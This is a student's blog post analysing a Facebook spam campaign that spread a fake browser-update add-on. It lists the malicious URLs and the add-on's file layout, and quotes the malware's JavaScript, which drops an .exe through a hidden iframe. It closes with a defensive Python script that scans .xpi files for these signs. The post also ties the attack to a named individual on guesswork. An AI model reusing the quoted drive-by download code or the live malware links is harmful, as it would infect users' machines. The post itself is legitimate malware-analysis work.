A little probe into the Facebook spam “Add plugin to update your browser”

——————————————  DISCLAIMER  —————————————————-

This research might contain sensitive data. Since all of it was exposed by the hacker, I take no responsibility whatsoever for any of the data; it was already publicly available.

Also, if some of my findings are wrong, that might just be the case. I did this for the first time, was half asleep, and was excited about my findings.

I am a student and have nothing to hide (as a hacker). This was purely a research-based chase-up and academically driven curiosity. I never hosted any illegal data/code, never executed the script and never contacted anyone, whomsoever may have been involved in this spam.

If you feel some terms have been used inappropriately, please leave a reply, and I'll correct them after reviewing the suggestion myself.


 

A note to the Frankenstein:

Hey hacker – sorry for this (if you ever read it), but you just spammed through my friend's account, and I was equally vulnerable. I was tagged in the FB post and then I found all this crap you made. Go find some clean methods of making money.
And you know what, it is my friend's birthday today, and he had to apologize to all those tagged (by all, I mean a lot of people; he has more than 1000 friends!).
So, deal with it. I don't know about the end results, but, you scoundrel! Burn.

——————————————————————————

*Pssss! hey friend, why you no have 10,000 friends? 😀

——————————————————————————-

Kindly ignore the formatting. I am not getting paid to do this work, hence don't care!
[Wrote this in emacs, used some arbitrary line separation art and bla bla bla...

Don't fret on it. Even if you do, I won't give a damn.]



Possible motivation for hacking:
The guy is motivated by some freedom movement, or is part of a group of hackers, or is just fooling around.

*Damn, such a good guess! 😀

Hence the message on http://www.kristysteinhaus.com/ in Arabic, translated:
"We do not know do not accept the threat of mercy
You freedom of expression, Crown Althecar"
When googled, "Crown Althecar" gave a link to http://www.sgvv.net/newsdetail.php?id=10, which is actually a hacked website giving a similar message and containing words like "victim".

ORIGIN:
FB spam http://bb1.co/1005090059 -> redirects to -> http://sarjad.net/theme/id/images/firefox.php
The page says it's a browser update in the form of an add-on, and asks us to reload and click update. This then hijacks the logged-in accounts and starts posting stuff from the victim's accounts.
The update button actually points to -> http://www.sarjad.net/theme/id/images/ribbons/socialne.xpi

PS: At this stage, people should've made some sense out of the URL before clicking update, or at least checked whether it's from a genuine origin! Anyways..

..so I downloaded and unzipped the spyware. This contained scripts for spamming FB profiles and for infecting the Firefox, Chrome, Opera and Safari browsers..
The spammer goes by the handle CasperCrazy (the guy just gave his name in the script file, so sophisticated! Even for a spammer, man, he's decent: the script even contained proper comments and formatting 😀)

After some searching, I got a few links; out of those,

one is -> http://board.airrivals.net/user/21734-caspercrazy/
another one is http://www.dl4hack.com/forum/members/caspercrazy.html

(more mentioned below..)

On further research, I found out he has also hacked other websites previously and likes to leave his footprints, like on this one:

http://www.kristysteinhaus.com/

and this one http://www.zone-h.org/mirror/id/16635059

More:

http://cdpheritage.org/hacked-by-casper-crazy-here-is-what-i-did-and-why-it-worked/

A small video shows a girl narrating an incident about how her blog showed up as hacked one day, and when she contacted her geeky boyfriend, he gave her a link which fixed her blog.

She says the link is below the video => is this another trick? Is the girl involved? When she says it's fixed (and I am hoping she is talking about this link, which still shows hacked: http://www.kristysteinhaus.com/), is she promoting something??

However, this website clarifies the hacks and also talks about the banking info leaks, as on:

https://docs.google.com/file/d/0B_j9nHbEe0UUS2xNOGtOWUpqMlU/preview?pli=1

..which was given in one of the profiles of this hacker.

Anyways, this hack which I probed into is a pretty good way of spamming and earning money (which is obvious when I viewed an HTML file I got from one of the spyware links; it's written there in French:
"Earn a lot of money in a short time thanks to this system")

Although his profile links suggest he's linked to Anonymous, I doubt he's just trying to fool around and earn money through spamming / phishing / social engineering.

===========================

[Screenshots from 2013-06-21]

Associated Links [..those which I could search in the little time I had, you know, to waste! 🙂]

============================
reported to:
1. Google https://www.google.com/webmasters/tools/spamreport?hl=en
2. StopBadware https://www.stopbadware.org/report-badware

===========================
http://www.sarjad.net/theme/id/images/ribbons/socialne.xpi

the directory structure of the spyware is:

|-- crazyjacks_googleCode
|   |-- Facebook-V5.0.2.exe
|   |-- new-all.js
|   |-- new-allma.js
|   |-- new-post.js
|   |-- new-postma.js
|   |-- new-user.js
|   `-- new-userma.js
|-- OpIsrael.xlsx
|-- report.txt
|-- socialne
|   |-- chrome
|   |-- chrome.manifest
|   |-- content
|   |   |-- all.js
|   |   |-- facebook.js
|   |   |-- filescript.xul
|   |   |-- prefman.js
|   |   |-- script-compiler.js
|   |   `-- xmlhttprequester.js
|   |-- defaults
|   |   `-- preferences
|   |       `-- prefs.js
|   `-- install.rdf
`-- socialne.xpi

6 directories, 19 files

Its chrome.manifest registers a content package named filecasper and overlays the main browser window (browser.xul) with filescript.xul, so the add-on's script is loaded with chrome privileges in every browser window:

content filecasper content/

overlay chrome://browser/content/browser.xul chrome://filecasper/content/filescript.xul

It uses the Greasemonkey API and code from https://code.google.com/p/crazyjacks/

The commit activity there implies it has been used recently, and this hack surfaced recently too.
Also, the spam link -> http://sarjad.net/theme/id/images/ribbons/urlgen.php -> is present in one of the JS files (new-post.js), which is proof that this Google Code repo is used for spamming.

The same repo contains an executable, Facebook-V5.0.2.exe; spyware? (I didn't execute it yet, to see what happens.)

..anyways, the snippet is:

// Cookies is a small cookie helper (init/read/create) presumably defined elsewhere in the same script; it is not shown here.
Cookies.init();
if (Cookies.read("exe_server") === null) Cookies.create("exe_server", "wakhaa", 30);
if (Cookies.read("exe_server") != "baraka") {
    // Hidden iframe pointed at the .exe; the random query string defeats caching.
    var iframe = document.createElement('iframe');
    iframe.style.display = "none";
    iframe.src = "http://crazyjacks.googlecode.com/files/Facebook-V5.0.2.exe?r" + Math.floor(Math.random()*1000000000000);
    document.body.appendChild(iframe);

    // Mark the drop as done so it only fires once per 30-day cookie lifetime.
    Cookies.create("exe_server", "baraka", 30);
}

....which suggests it's using this exe to post stuff from new-all.js (maybe?)
I didn't read the code properly, just guessed.

Since I haven't fully analyzed it all yet, maybe you could help me out? (I do not have the whole day just for this!)

So once again, all the code I could get is present on:
https://code.google.com/p/crazyjacks/ ,
http://www.sarjad.net/theme/id/images/ribbons/socialne.xpi
&
http://sarjad.net/theme/id/images/firefox.php

I used wget to download it safely, unzip on the command line to inflate the .xpi file, and Inspect Element to observe the related JS, links and images being loaded.
For those "who wish to try this at home", use these precautions (and maybe more?) or you might end up being a victim! :/
Hope an expert is reading this. I am just too curious about this hack, since this is my first spyware research exploration and back-tracking experience.
Help me out & keep me posted 🙂
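A defender-side way to do the same inspection without ever installing the add-on, as an added example that is not code from the post or from the add-on: it opens the .xpi as a plain zip, parses chrome.manifest for overlay lines (the browser.xul overlay shown above) and scans every .js member for the hidden-iframe / .exe drop pattern from the quoted snippet. The sample archive it builds is constructed to mirror the real layout; the URL inside it is a placeholder, not the real one.

```python
# Added example, not the post's code: static triage of an .xpi without installing it.
# Parses chrome.manifest for browser-UI overlays and scans .js members for the hidden-iframe/.exe drop pattern.
import io
import re
import zipfile

JS_INDICATORS = {  # patterns taken from the snippet quoted in the post
    "hidden_iframe": re.compile(r"createElement\(\s*['\"]iframe['\"]\s*\)"),
    "display_none": re.compile(r"style\.display\s*=\s*['\"]none['\"]"),
    "exe_url": re.compile(r"https?://[^'\"\s]+\.exe", re.IGNORECASE),
}

def overlay_targets(manifest_text):
    """Return the chrome:// documents that 'overlay' lines in chrome.manifest hook into."""
    targets = []
    for line in manifest_text.splitlines():
        parts = line.split()
        if len(parts) >= 3 and parts[0] == "overlay":
            targets.append(parts[1])
    return targets

def triage_xpi(data):
    """Inspect raw .xpi bytes (a zip archive) and report overlay and JS indicator hits."""
    findings = {"browser_overlay": False, "js_hits": {}}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
        if "chrome.manifest" in names:
            targets = overlay_targets(z.read("chrome.manifest").decode("utf-8", "replace"))
            # An overlay on browser.xul runs in every browser window with full chrome privileges.
            findings["browser_overlay"] = any(t.endswith("browser.xul") for t in targets)
        for name in names:
            if name.endswith(".js"):
                src = z.read(name).decode("utf-8", "replace")
                hits = [k for k, rx in JS_INDICATORS.items() if rx.search(src)]
                if hits:
                    findings["js_hits"][name] = hits
    return findings

def build_sample_xpi():
    """Constructed stand-in mirroring the real add-on's layout and the quoted snippet (placeholder URL)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("chrome.manifest", "content filecasper content/\n"
                   "overlay chrome://browser/content/browser.xul "
                   "chrome://filecasper/content/filescript.xul\n")
        z.writestr("content/all.js", "var iframe = document.createElement('iframe');\n"
                   "iframe.style.display = \"none\";\n"
                   "iframe.src = \"http://example.invalid/Facebook-V5.0.2.exe?r\" + Math.random();\n")
    return buf.getvalue()
```

Run triage_xpi on the bytes of a downloaded .xpi (never on an installed one) and treat a browser.xul overlay combined with any js_hits as grounds to report rather than click update.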

=========================================================

 
